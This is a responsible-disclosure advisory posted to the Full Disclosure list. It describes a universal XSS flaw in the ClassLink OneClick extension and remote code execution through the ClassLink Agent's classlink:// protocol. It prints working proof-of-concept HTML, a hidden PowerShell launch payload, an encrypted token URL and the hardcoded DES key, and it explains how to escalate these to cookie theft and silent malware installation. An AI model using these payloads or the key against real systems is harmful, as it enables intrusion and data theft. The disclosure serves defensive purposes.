ClassLink browser extension vulnerable to UXSS; ClassLink Agent vulnerable to Remote Code Execution.

[EdTech Secure via Fulldisclosure <fulldisclosure () seclists org>]

The ClassLink OneClick Browser Extension and the ClassLink Agent are vulnerable to Universal XSS and Remote Code 
Execution. Vendor has released software updates to fix both vulnerabilities on 3 June 2018.

=== Vendor ===
ClassLink: https://www.classlink.com

=== Vulnerability #1: Universal XSS through the OneClick Extension ===

To log users into websites, the ClassLink OneClick Extension injects JavaScript into the target webpage to perform the 
login. To begin this flow, a user visits a page that contains metadata about the target and the JavaScript to be 
injected. This page is not authenticated, which means it can be trivially forged by an attacker.

The extension only looks for URLs that contain the string "browsersso/". If that is found, it looks in the "head" tag 
for a login_url and scripts, such as pre_auth_script. None of these fields or the page itself are authenticated in any 
way.

An attacker could create a page that contains the correct string in the URL and include a script that goes to any 
website, and execute JavaScript to steal information such as cookies, API keys, saved credentials or any private 
information. This could then be posted to the attacker's server. A user simply visiting the page would trigger the 
attack.

Here is a simple proof of concept:

<!doctype>
<html>
  <head>
    <title>.</title>
    <script type="text">
      appResponse: var x = {}; x.selectors = []; x.userauth = []; x.login_url = "https://google.com";; x.pre_auth_script 
= "alert('XSS running on Google. document.cookie = ' + document.cookie)"; x,
      gwstokenMd5: x,
    </script>
  </head>
  <body>.</body>
</html>

If this page is hosted at any URL that contains "browsersso/" and is visited by a user the ClassLink OneClick Extension 
installed, it will automatically navigate to Google and show an alert box with your current cookie on 
https://google.com, with no user interaction. A malicious script could, instead, post this or any other private 
information on the page to a remote server.

=== Vulnerability #2: Remote Code Execution Using classlink:// URL Protocol ===

The classlink:// URL protocol allows links to launch executables or open files on the system. This protocol is enabled 
by installing the ClassLink Agent.

The links contain a JSON-encoded payload encrypted using DES in ECB mode using a static symmetric key hardcoded into 
the executable of "234hyg32". The payload is not authenticated.

Because the payload is not authenticated in any way (the encryption does not function as authentication in this 
context), it can be arbitrarily modified. Since these URLs can launch executables with arbitrary parameters, it's 
trivial to leverage this into a remote code execution attack through the use of things like PowerShell or other local 
scripting environments included in Windows. For example in the following payload:

{
    "LocalAppLaunchType": "localapp",
    "path": [
        "%windir%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    ],
    "param": "-exec\" bypass -windowstyle hidden -c 
\"[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms'); 
[System.Windows.Forms.MessageBox]::Show('This is an code execution proof on concept. The current logged in user is ' + 
[System.Security.Principal.WindowsIdentity]::GetCurrent().Name)",
    "ignorepath": 0
}

This shows a proof of concept that runs a PowerShell command that will show the currently logged in user in a message 
box. This example payload can be encoded into the following URL, which will execute if clicked:

classlink:?token=d8iB7//4z+OFo5AQXymHv8lBs8SXhtBS4AZZ4M6p7nd1FQgVyBp/ajo09TdBpnqKEmVIHHBUSvug1UkzP5z/VrMNJLX1u/q4mpQZuunvtp6KuF5S+qOe4rVbgktgm99qJtcmKeYVe9YLdYse33KUz8LXyD8e7WjugE24w7CY6WBGlnMfm2T1W7Fz1JtIv4c/yu9LDkCsYivj7vxxR3LyIzaKe5DZkr3gOf5wG8QkwdrXrd2ga2/bgGWj+b11nk1OZmLqyYpDmTs/6JarhH4zvPU2foWHkOsYmUqhwDcSaVGmfA61KcGCNoIboV2H+k8FAgn4XA6aZQRMYOaCR+AgRRGAbCx0G1PUf4ipCKRVQqrrZQwN5aLRWJ7bXJllSeGDSmWDbNT/Zkleg6t7LiZSFaI2+4s8xGKRsTqgqY+BFG3MFge5tgrtv7khtDG1YaJhyyCICoXh8AlAHizRSsQG+cQ9KnwHJTvGPucfZC9h63+0OJQIVeeBrrhU1CTa6WxsowmI6b4dPGiGd4QHUAqdC6xLyeuuyIlFaHROO3Sb7JT8YZ149ItGc9MAAItr2bGy

Alternatively, this link can be clicked automatically with JavaScript, so that visiting a web page is all that is 
required to trigger it. This example be modified to run any command, like downloading another executable from a remote 
source and executing it, allowing for the silent installation of malware just by visiting an attacker controlled 
webpage.

Additionally, the encryption used in the payload is not sufficient for modern use. Single DES is a deprecated standard 
and was withdrawn from recommended use in October 1999. The use of ECB Mode allows for a large number of attacks 
against the encrypted data itself. Also, the key size and character set do not have enough entropy to be sufficiently 
strong. A simple brute force on a modest machine could guess the key in approximately 24 hours.

=== Timeline ===

April 14th, 2018 - Reached out to vendor
May 7th, 2018 - Reply from vendor, sent disclosure
May 8th, 2018 - Vendor verified the issue and begun working on a fix
June 3rd, 2018 - Vendor confirmed fixes have been released

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/